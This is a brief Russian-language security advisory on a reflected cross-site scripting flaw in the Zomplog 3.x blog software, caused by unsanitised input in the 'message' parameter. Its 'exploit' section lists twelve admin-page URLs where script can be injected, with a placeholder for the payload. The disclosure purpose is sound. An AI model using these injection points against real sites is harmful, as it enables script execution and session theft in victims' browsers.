Программа: Zomplog 3.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "message" различными сценариями. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.

Эксплоит:

http://[host]/admin/users.php?message=[code]
http://[host]/admin/category.php?message=[code]
http://[host]/admin/entry.php?message=[code]
http://[host]/admin/newentry.php?message=[code]
http://[host]/admin/comments.php?message=[code]
http://[host]/admin/newpage.php?message=[code]
http://[host]/admin/page.php?message=[code]
http://[host]/admin/settings.php?message=[code]
http://[host]/admin/changeclothes.php?message=[code]
http://[host]/admin/settings_theme.php?message=[code]
http://[host]/admin/themes.php?message=[code]
http://[host]/admin/plugins.php?message=[code]



Оставить мнение